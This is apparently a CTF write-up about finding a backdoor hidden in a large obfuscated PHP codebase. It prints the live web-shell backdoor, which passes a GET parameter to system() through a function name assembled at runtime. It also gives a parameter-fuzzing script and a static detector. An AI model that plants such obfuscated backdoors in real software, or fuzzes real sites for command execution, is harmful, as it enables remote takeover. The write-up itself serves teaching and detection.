Challenge environment: https://buuoj.cn/challenges#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2
The challenge says the site has been hacked and hands out its source: more than three thousand files, with meaningless variable names and strings throughout. Combined with the challenge title and description, the guess is that we have to find a backdoor hidden somewhere in the source.
The code is full of functions like eval and system, but almost none of them can actually be fed code or a command. Two typical decoy forms:

```php
$_GET['jVMcNhK_F'] = ' ';
system($_GET['jVMcNhK_F'] ?? ' ');
```

Here the request parameter is overwritten with a constant before it reaches system().

```php
if ('V8dfwnVA5' == 'n3Ofh5nSW') system($_POST['V8dfwnVA5'] ?? ' ');
```

Here the call sits behind a comparison of two different string literals, so it never executes.
The code base is huge; going through it by hand would wear your eyes out and still turn up nothing. Fuzzing works better: write a script that extracts every GET and POST parameter name from the source and sends a marker payload to each one.
If the marker string shows up in the returned HTML, that parameter is a usable backdoor.
```python
from multiprocessing import Pool
import os
import re
import requests

# Local copy of the challenge source (served by phpstudy) and its URL prefix
path = "D:\\phpstudy\\PHPTutorial\\WWW\\src"
files = os.listdir(path)
url = "http://127.0.0.1/src/"

# Marker payload: a valid shell command for system()/exec()-style sinks
# (an eval() sink would need a trailing ';' for the same payload to parse)
MARKER = "wxynb"
PAYLOAD = "echo '%s'" % MARKER

# Every $_GET['name'] / $_POST['name'] read, including several on one line
PARAM = re.compile(r"\$_(GET|POST)\['([^']+)'\]")


def readfile(filename):
    # The obfuscated sources are not guaranteed to be clean in the local encoding
    with open(os.path.join(path, filename), "r", errors="ignore") as f:
        for line in f:
            for method, name in PARAM.findall(line):
                if method == "GET":
                    findget(filename, name)
                else:
                    findpost(filename, name)


def findget(filename, get):
    # requests percent-encodes the quotes and space in the payload for us
    response = requests.get(url + filename, params={get: PAYLOAD})
    if MARKER in response.text:
        print(url + filename + "?" + get + "=" + PAYLOAD)


def findpost(filename, post):
    response = requests.post(url + filename, data={post: PAYLOAD})
    if MARKER in response.text:
        print(url + filename, "POST", post)


if __name__ == '__main__':
    # Eight worker processes; Pool.map hands out the files itself, so no
    # trailing chunk is lost when len(files) is not divisible by 8
    with Pool(8) as p:
        p.map(readfile, files)
    print('All subprocesses done.')
```
The backdoor turned out to be in xk0SzyKwfzw.php, reachable through the GET parameter Efa5BVG. The code:

```php
$XnEGfa = $_GET['Efa5BVG'] ?? ' ';
$aYunX = "sY";
$aYunX .= "stEmXnsTcx";          // "sYstEmXnsTcx"
$aYunX = explode('Xn', $aYunX);  // ["sYstEm", "sTcx"]
$kDxfM = new stdClass();
$kDxfM->gHht = $aYunX[0];        // "sYstEm": PHP function names are case-insensitive
($kDxfM->gHht)($XnEGfa);         // system($_GET['Efa5BVG'])
```
It is hidden fairly deep: the name "system" is assembled from two string pieces at runtime, cut out with explode(), stored in an object property and called indirectly, so grepping for dangerous functions one by one would never find it.
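The black-box fuzz above finds the backdoor without understanding it; the following is an added example (my code, not part of the writeup or the challenge source) of the complementary white-box approach: a tiny constant folder that resolves exactly the string-building idioms the backdoor uses (`.`, `.=`, `explode()`, `[n]`, object properties, indirect `($x)(...)` calls) and discards both decoy forms shown earlier (a request parameter clobbered with a constant, and a guard comparing two unequal literals). The sample PHP is constructed from the snippets in this writeup; request values that survive folding are represented by `<GET:name>`/`<POST:name>` markers, and the list of builtins to report is my own choice. It handles only this subset of PHP (no escapes in strings, no comments, no nested parentheses in `if` conditions), which is enough for the pattern at hand.

```python
import re

# Builtins worth reporting when they turn out to be the callee of a call.
DANGEROUS = {"system", "exec", "shell_exec", "passthru", "eval", "assert", "popen", "proc_open"}

# Constructed sample: the writeup's backdoor plus its two decoy forms (not the real tree).
SAMPLE = r"""<?php
$_GET['jVMcNhK_F'] = ' ';
system($_GET['jVMcNhK_F'] ?? ' ');
if ('V8dfwnVA5' == 'n3Ofh5nSW') system($_POST['V8dfwnVA5'] ?? ' ');
$XnEGfa = $_GET['Efa5BVG'] ?? ' ';
$aYunX = "sY";
$aYunX .= "stEmXnsTcx";
$aYunX = explode('Xn', $aYunX);
$kDxfM = new stdClass();
$kDxfM->gHht = $aYunX[0];
($kDxfM->gHht)($XnEGfa);
"""

STR_LIT = re.compile(r"^(?:\"([^\"]*)\"|'([^']*)')$")
SUPERGLOBAL = re.compile(r"^\$_(GET|POST|REQUEST|COOKIE)\[\s*(?:'([^']*)'|\"([^\"]*)\")\s*\]$")
ASSIGN = re.compile(r"^(\$\w+(?:->\w+)?|\$_\w+\[[^\]]*\])\s*(\.=|=)\s*(.*)$", re.S)
CALL = re.compile(r"^(\(.*?\)|\$\w+(?:->\w+)?|\w+)\s*\((.*)\)$", re.S)
GUARD = re.compile(r"^if\s*\((.*?)\)\s*(.*)$", re.S)
TAINT = re.compile(r"<(GET|POST|REQUEST|COOKIE):")

# '<GET:name>' placeholder for a request value that was not replaced by a constant.
marker = lambda m: "<%s:%s>" % (m.group(1), m.group(2) or m.group(3))


def split_top(text, sep):
    """Split on `sep` outside quotes and brackets (no escape handling)."""
    parts, cur, depth, quote = [], "", 0, None
    for ch in text:
        if quote:
            quote = None if ch == quote else quote
        elif ch in "\"'":
            quote = ch
        elif ch in "([)]":
            depth += 1 if ch in "([" else -1
        elif ch == sep and depth == 0:
            parts, cur = parts + [cur], ""
            continue
        cur += ch
    return [p.strip() for p in parts + [cur] if p.strip()]


def evaluate(expr, env):
    """Fold literals, '.', explode(), [n], ??, variables, properties and superglobal reads."""
    expr = expr.strip()
    parts = split_top(expr, ".")
    if len(parts) > 1:
        vals = [evaluate(p, env) for p in parts]
        return "".join(vals) if all(isinstance(v, str) for v in vals) else None
    if expr.startswith("(") and expr.endswith(")"):
        return evaluate(expr[1:-1], env)
    if "??" in expr:                      # `$x ?? default`: the left side is what matters
        return evaluate(expr.split("??", 1)[0], env)
    if m := STR_LIT.match(expr):
        return m.group(1) if m.group(1) is not None else m.group(2)
    if m := SUPERGLOBAL.match(expr):      # stays a marker unless an assignment clobbered it
        return env.get(marker(m), marker(m))
    if re.fullmatch(r"\$\w+(?:->\w+)?", expr):
        return env.get(expr)
    if m := re.fullmatch(r"(\$\w+)\[\s*(\d+)\s*\]", expr):
        arr, i = env.get(m.group(1)), int(m.group(2))
        return arr[i] if isinstance(arr, list) and i < len(arr) else None
    if expr.startswith("explode(") and expr.endswith(")"):
        args = [evaluate(a, env) for a in split_top(expr[8:-1], ",")]
        if len(args) == 2 and all(isinstance(a, str) for a in args) and args[0]:
            return args[1].split(args[0])
    return None                           # unknown (e.g. `new stdClass()`)


def analyze(stmt, env, findings):
    if m := GUARD.match(stmt):            # `if ('a' == 'b') ...` with unequal literals is dead code
        cond, stmt = m.group(1), m.group(2)
        eq = re.match(r"^(.+?)\s*={2,3}\s*(.+)$", cond)
        if eq and all(STR_LIT.match(s.strip()) for s in eq.groups()):
            if evaluate(eq.group(1), env) != evaluate(eq.group(2), env):
                return
    if m := ASSIGN.match(stmt):
        lhs, op, rhs = m.groups()
        sg = SUPERGLOBAL.match(lhs)       # `$_GET['x'] = ' '` overwrites the input with a constant
        key = marker(sg) if sg else lhs
        value, prev = evaluate(rhs, env), env.get(key)
        if op == ".=":
            value = prev + value if isinstance(prev, str) and isinstance(value, str) else None
        env[key] = value
    elif m := CALL.match(stmt):
        callee = m.group(1) if re.fullmatch(r"\w+", m.group(1)) else evaluate(m.group(1), env)
        if isinstance(callee, str) and callee.lower() in DANGEROUS:
            arg = evaluate(m.group(2), env)
            if isinstance(arg, str) and TAINT.search(arg):
                findings.append((callee.lower(), arg))


def scan(php_source):
    """Return [(builtin, tainted_argument)] for calls that resolve to a dangerous builtin."""
    env, findings = {}, []
    for stmt in split_top(re.sub(r"^\s*<\?php", "", php_source.strip()), ";"):
        analyze(stmt, env, findings)
    return findings
```

Running `scan(SAMPLE)` reports only the live sink, `("system", "<GET:Efa5BVG>")`: the first decoy folds to a constant argument and the second is skipped as dead code, while the case-insensitive comparison catches `sYstEm`. Run over the real tree this would be a fast triage pass, with the fuzzer as the ground truth for anything the folder cannot resolve.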